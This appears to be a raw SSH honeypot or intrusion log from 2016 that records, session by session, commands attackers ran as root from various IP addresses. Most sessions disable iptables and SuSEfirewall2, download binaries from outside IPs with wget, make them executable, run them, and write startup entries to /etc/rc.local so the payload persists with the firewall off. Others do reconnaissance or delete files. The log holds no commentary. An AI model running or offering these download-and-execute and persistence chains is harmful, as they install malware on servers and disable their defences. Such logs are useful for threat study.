stop reSuSEfirewall2 stop cd /tmp wget -c http://222.186.34.162:8080/Lin3.6 chmod 777 Lin3.6 ./Lin3.6 echo "cd /tmp/">>/etc/rc.local echo "./Lin3.6&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 139.204.24.57 19-Aug-2016 10:29:21 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://111.73.45.16:8543/linux-arm;chmod 777 linux-arm;./linux-arm;echo "cd /tmp/">>/etc/rc.local;echo "./linux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://111.73.45.16:8543/linux-arm chmod 777 linux-arm ./linux-arm echo "cd /tmp/">>/etc/rc.local echo "./linux-arm&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 139.204.24.57 19-Aug-2016 20:50:19 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.34.168:50130/weadfg;chmod 777 weadfg;./weadfg;echo "cd /tmp/">>/etc/rc.local;echo "./weadfg&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.186.34.168:50130/weadfg chmod 777 weadfg ./weadfg echo "cd /tmp/">>/etc/rc.local echo "./weadfg&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 139.203.98.201 20-Aug-2016 17:32:15 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://180.97.239.33:59446/opns;chmod 777 opns;./opns;echo "cd /tmp/">>/etc/rc.local;echo "./opns&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://180.97.239.33:59446/opns chmod 777 opns ./opns echo "cd /tmp/">>/etc/rc.local echo "./opns&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 139.203.98.201 21-Aug-2016 14:14:11 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.59.71:9872/Linux;chmod 777 Linux;./Linux;echo "cd /tmp/">>/etc/rc.local;echo "./Linux&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.186.59.71:9872/Linux chmod 777 Linux ./Linux echo "cd /tmp/">>/etc/rc.local echo "./Linux&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 139.203.98.201 22-Aug-2016 00:35:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://111.73.45.16:8543/Linux-syn25000;chmod 777 Linux-syn25000;./Linux-syn25000;echo "cd /tmp/">>/etc/rc.local;echo "./Linux-syn25000&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://111.73.45.16:8543/Linux-syn25000 chmod 777 Linux-syn25000 ./Linux-syn25000 echo "cd /tmp/">>/etc/rc.local echo "./Linux-syn25000&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 139.203.98.201 22-Aug-2016 10:56:07 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://183.60.204.58:9697/wget;chmod 777 wget;./wget;echo "cd /tmp/">>/etc/rc.local;echo "./wget&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://183.60.204.58:9697/wget chmod 777 wget ./wget echo "cd /tmp/">>/etc/rc.local echo "./wget&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 139.203.98.201 22-Aug-2016 21:17:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;L1 -c http://107.189.48.35:6666/L1;chmod 777 L1;./L1;echo "cd /tmp/">>/etc/rc.local;echo "./L1&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp L1 -c http://107.189.48.35:6666/L1 chmod 777 L1 ./L1 echo "cd /tmp/">>/etc/rc.local echo "./L1&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 139.203.98.201 23-Aug-2016 17:59:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://111.73.45.16:52430/opks;chmod 777 opks;./opks;echo "cd /tmp/">>/etc/rc.local;echo "./opks&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://111.73.45.16:52430/opks chmod 777 opks ./opks echo "cd /tmp/">>/etc/rc.local echo "./opks&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 14.157.73.70 28-Aug-2016 01:28:41 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://220.169.242.158:6666/xudp;chmod 777 xudp;./xudp;echo "cd /tmp/">>/etc/rc.local;echo "./xudp&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://220.169.242.158:6666/xudp chmod 777 xudp ./xudp echo "cd /tmp/">>/etc/rc.local echo "./xudp&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 14.157.74.245 28-Aug-2016 11:49:39 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://220.169.242.158:6666/2;chmod 777 2;./2;echo "cd /tmp/">>/etc/rc.local;echo "./2&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://220.169.242.158:6666/2 chmod 777 2 ./2 echo "cd /tmp/">>/etc/rc.local echo "./2&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 222.186.233.85 28-Aug-2016 22:10:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://183.60.204.58:9697/miusi;chmod 777 miusi;./miusi;echo "cd /tmp/">>/etc/rc.local;echo "./miusi&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://183.60.204.58:9697/miusi chmod 777 miusi ./miusi echo "cd /tmp/">>/etc/rc.local echo "./miusi&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 139.203.101.211 29-Aug-2016 08:31:35 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://114.215.199.164:8080/linux-arm;chmod 777 linux-arm;.nux-arm;echo "cd /tmp/">>/etc/rc.local;echo ".nux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://114.215.199.164:8080/linux-arm chmod 777 linux-arm .nux-arm echo "cd /tmp/">>/etc/rc.local echo ".nux-arm&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 192.99.81.66 30-Aug-2016 14:48:46 ssh2 root ssh ssh root@167.114.3.141 exit From 159.65.34.63 30-Aug-2016 16:54:13 ssh2 root uname -a lscpu cat /proc/pcuinfo cat /proc/cp cd /home ls top From 159.65.34.63 30-Aug-2016 21:47:17 ssh2 root ps -ef cat /etc/*release history From 192.99.81.66 31-Aug-2016 02:40:21 ssh2 root ssh ssh root@167.114.3.141- exit From 159.65.34.63 31-Aug-2016 07:33:25 ssh2 root uname -a top exit From 113.204.53.134 3-Sep-2016 12:43:11 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.214.170.92:7788/breeb;chmod 777 breeb;./breeb; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://103.214.170.92:7788/breeb chmod 777 breeb ./breeb From 159.89.179.210 3-Sep-2016 13:42:29 ssh2 root uname -a lscpu cat /etc/cpuinfo tput rmcup top ps -ef history From 172.87.26.140 3-Sep-2016 23:04:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.26.140:8080/linux-arm;chmod 777 linux-arm;./linux-arm;echo "cd /tmp/">>/etc/rc.local;echo "./linux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://172.87.26.140:8080/linux-arm chmod 777 linux-arm ./linux-arm echo "cd /tmp/">>/etc/rc.local echo "./linux-arm&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 172.87.26.140 4-Sep-2016 09:25:07 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.26.140:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6;echo "cd /tmp/">>/etc/rc.local;echo "./Linux2.6&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://172.87.26.140:8080/Linux2.6 chmod 777 Linux2.6 ./Linux2.6 echo "cd /tmp/">>/etc/rc.local echo "./Linux2.6&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 222.186.50.56 6-Sep-2016 23:30:55 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.50.56:4478/breeb;chmod 777 breeb;./breeb; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.50.56:4478/breeb chmod 777 breeb ./breeb From 222.186.56.176 9-Sep-2016 23:57:41 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.10.172.185:15432/L24E;chmod 777 L24E;./L24E;echo "cd /tmp/">>/etc/rc.local;echo "./L24E&";wget -c http://121.10.172.185:15432/SYny;chmod 777 SYny./SYny;echo "cd /tmp/">>/etc/rc.local;echo "./SYny&";wget -c http://121.10.172.185:15432/UDse;chmod 777 UDse;./UDse;echo "cd /tmp/">>/etc/rc.local;echo "./UDse&";wget -c http://121.10.172.185:15432/Freedy;chmod 777 Freedy;./Freedy;echo "cd /tmp/">>/etc/rc.local;echo "./Freedy&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://121.10.172.185:15432/L24E chmod 777 L24E ./L24E echo "cd /tmp/">>/etc/rc.local echo "./L24E&" wget -c http://121.10.172.185:15432/SYny chmod 777 SYny./SYny echo "cd /tmp/">>/etc/rc.local echo "./SYny&" wget -c http://121.10.172.185:15432/UDse chmod 777 UDse ./UDse echo "cd /tmp/">>/etc/rc.local echo "./UDse&" wget -c http://121.10.172.185:15432/Freedy chmod 777 Freedy ./Freedy echo "cd /tmp/">>/etc/rc.local echo "./Freedy&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 120.76.112.19 15-Sep-2016 14:30:15 ssh2 root wget http://117.21.191.201:9090/260 curl -O http://117.21.191.201:9090/260 wget http://117.21.191.201:9090/04 From 123.191.66.176 17-Sep-2016 18:15:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://171.92.208.129:3123/006;chmod 777 006;./006;echo "cd /tmp/">>/etc/rc.local;echo "./006&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://171.92.208.129:3123/006 chmod 777 006 ./006 echo "cd /tmp/">>/etc/rc.local echo "./006&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 123.191.66.176 18-Sep-2016 04:36:03 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://171.92.208.129:3123/007;chmod 777 007;./007;echo "cd /tmp/">>/etc/rc.local;echo "./007&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://171.92.208.129:3123/007 chmod 777 007 ./007 echo "cd /tmp/">>/etc/rc.local echo "./007&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 123.191.66.176 18-Sep-2016 14:57:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://171.92.208.129:3123/007;chmod 777 007;./007;echo "cd /tmp/">>/etc/rc.local;echo "./007&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://171.92.208.129:3123/007 chmod 777 007 ./007 echo "cd /tmp/">>/etc/rc.local echo "./007&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://171.92.208.129:3123/007;chmod 777 007;./007;echo "cd /tmp/">>/etc/rc.local;echo "./007&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://171.92.208.129:3123/007 chmod 777 007 ./007 echo "cd /tmp/">>/etc/rc.local echo "./007&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 61.147.110.23 21-Sep-2016 15:23:47 ssh2 root service iptables stop wget http://171.92.208.129:3123/001 chmod 777 001 nohup ./001 wget http://171.92.208.128:3123/007 chmod 777 007 nohup From 222.187.224.159 30-Sep-2016 06:23:07 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://171.92.208.129:3123/001;chmod 777 001;./001;echo "cd /tmp/">>/etc/rc.local;echo "./001&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://171.92.208.129:3123/001 chmod 777 001 ./001 echo "cd /tmp/">>/etc/rc.local echo "./001&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 221.194.44.209 1-Oct-2016 13:26:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.158:7723/pzmo;chmod 777 qzmo;./qzmo;echo "cd /tmp/">>/etc/rc.local;echo "./qzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.158:7723/pzmo chmod 777 qzmo ./qzmo echo "cd /tmp/">>/etc/rc.local echo "./qzmo&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 221.194.44.209 1-Oct-2016 23:46:59 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.158:7723/pzmo;chmod 777 pzmo;./pzmo;echo "cd /tmp/">>/etc/rc.local;echo "./pzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.158:7723/pzmo chmod 777 pzmo ./pzmo echo "cd /tmp/">>/etc/rc.local echo "./pzmo&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 139.203.97.132 4-Oct-2016 13:52:47 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.215.230.76:12234/syn7;chmod 777 syn7;./syn7;echo "cd /tmp/">>/etc/rc.local;echo "./syn7&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.215.230.76:12234/syn7 chmod 777 syn7 ./syn7 echo "cd /tmp/">>/etc/rc.local echo "./syn7&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 115.231.222.116 8-Oct-2016 00:40:31 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;wget -c http://121.10.172.185:18090/sys.sh;chmod 777 sys.sh;./sys.sh;echo "cd /etc/">>/etc/rc.local;echo "./sys.sh&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /etc wget -c http://121.10.172.185:18090/sys.sh chmod 777 sys.sh ./sys.sh echo "cd /etc/">>/etc/rc.local echo "./sys.sh&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 223.148.220.6 10-Oct-2016 14:46:19 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://120.26.205.46:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://120.26.205.46:8080/Linux2.6 chmod 777 Linux2.6 ./Linux2.6 From 221.194.44.209 11-Oct-2016 21:49:13 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.209:7791/zzmo;chmod 777 zzmo;./zzmo;echo "cd /tmp/">>/etc/rc.local;echo "./zzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.209:7791/zzmo chmod 777 zzmo ./zzmo echo "cd /tmp/">>/etc/rc.local echo "./zzmo&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 110.19.181.194 15-Oct-2016 11:54:13 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /usr/bin/;rm -rf bar.sh;wget -c http://116.196.120.20:443/bar.sh;chmod 0777 bar.sh;./bar.sh; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /usr/bin/ rm -rf bar.sh wget -c http://116.196.120.20:443/bar.sh chmod 0777 bar.sh ./bar.sh From 61.180.70.119 16-Oct-2016 15:39:51 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.203:8888/VIP;chmod 777 VIP;./VIP; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.21.203:8888/VIP chmod 777 VIP ./VIP From 223.220.149.164 17-Oct-2016 12:21:47 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.76:8080/f;chmod 777 f;./f; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://222.186.34.76:8080/f chmod 777 f ./f From 192.225.224.187 19-Oct-2016 16:06:37 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.31.80:8080/Linux;chmod 777 Linux;./Linux;echo "cd /tmp/">>/etc/rc.local;echo "./Linux&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://172.87.31.80:8080/Linux chmod 777 Linux ./Linux echo "cd /tmp/">>/etc/rc.local echo "./Linux&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 115.239.230.227 22-Oct-2016 06:12:25 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /etc;wget http://202.181.24.140:18090/steam;chmod 777 steam;./steam /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /etc wget http://202.181.24.140:18090/steam chmod 777 steam ./steam From 221.194.44.225 22-Oct-2016 16:33:23 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.225:7791/vzmo;chmod 777 vzmo;./vzmo;echo "cd /tmp/">>/etc/rc.local;echo "./vzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.225:7791/vzmo chmod 777 vzmo ./vzmo echo "cd /tmp/">>/etc/rc.local echo "./vzmo&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 119.249.54.66 24-Oct-2016 09:57:15 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.225:7791/dzmo;chmod 777 dzmo;./dzmo;echo "cd /tmp/">>/etc/rc.local;echo "./dzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.225:7791/dzmo chmod 777 dzmo ./dzmo echo "cd /tmp/">>/etc/rc.local echo "./dzmo&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 220.191.208.195 24-Oct-2016 20:18:13 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://101.1.27.170:280/breeb;chmod 777 breeb;./breeb; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://101.1.27.170:280/breeb chmod 777 breeb ./breeb From 159.89.179.210 25-Oct-2016 06:21:25 ssh2 root lscpu cat /proc/cpuinfo uname -a history exit From 221.194.44.225 29-Oct-2016 14:08:51 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.225:7791/rzmo;chmod 777 rzmo;./rzmo;echo "cd /tmp/">>/etc/rc.local;echo "./rzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.225:7791/rzmo chmod 777 rzmo ./rzmo echo "cd /tmp/">>/etc/rc.local echo "./rzmo&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 167.99.240.173 31-Oct-2016 22:32:37 ssh2 root top ps -ef cd /etc/libX ls rm * From 192.99.81.66 1-Nov-2016 08:18:45 ssh2 root Exec ps -ef | grep syslog ps -ef | grep syslog From 115.231.222.145 6-Nov-2016 07:26:15 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://202.181.24.140:18090/systeam.sh;chmod 777 systeam.sh;./systeam.sh;echo "cd /tmp/">>/etc/rc.local;echo "./systeam.sh&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://202.181.24.140:18090/systeam.sh chmod 777 systeam.sh ./systeam.sh echo "cd /tmp/">>/etc/rc.local echo "./systeam.sh&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 106.110.144.191 9-Nov-2016 18:13:59 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.31.80:8080/linux-arm;chmod 777 linux-arm;./linux-arm;echo "cd /tmp/">>/etc/rc.local;echo "./linux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://172.87.31.80:8080/linux-arm chmod 777 linux-arm ./linux-arm echo "cd /tmp/">>/etc/rc.local echo "./linux-arm&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 106.110.144.191 10-Nov-2016 04:34:57 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.31.80:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6;echo "cd /tmp/">>/etc/rc.local;echo "./Linux2.6&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://172.87.31.80:8080/Linux2.6 chmod 777 Linux2.6 ./Linux2.6 echo "cd /tmp/">>/etc/rc.local echo "./Linux2.6&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 183.131.83.198 10-Nov-2016 14:55:55 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.131.83.198:786/gw1;chmod 777 gw1;./gw1; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.131.83.198:786/gw1 chmod 777 gw1 ./gw1 From 111.73.45.188 11-Nov-2016 01:16:53 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.188:9876/pmm;chmod 777 pmm;./pmm; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://111.73.45.188:9876/pmm chmod 777 pmm ./pmm From 220.191.208.195 12-Nov-2016 18:40:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://218.28.143.118:5198/breeb;chmod 777 breeb;./breeb; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://218.28.143.118:5198/breeb chmod 777 breeb ./breeb From 221.194.44.225 20-Nov-2016 02:37:11 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.225:7791/pomo;chmod 777 pomo;./pomo;echo "cd /tmp/">>/etc/rc.local;echo "./pomo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.225:7791/pomo chmod 777 pomo ./pomo echo "cd /tmp/">>/etc/rc.local echo "./pomo&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 115.239.230.227 25-Nov-2016 17:09:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c hhttp://115.239.230.227:280/tmp2.4;chmod 777 tmp2.4;./tmp2.4; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c hhttp://115.239.230.227:280/tmp2.4 chmod 777 tmp2.4 ./tmp2.4 From 220.191.208.195 26-Nov-2016 03:30:43 ssh2 root Exec 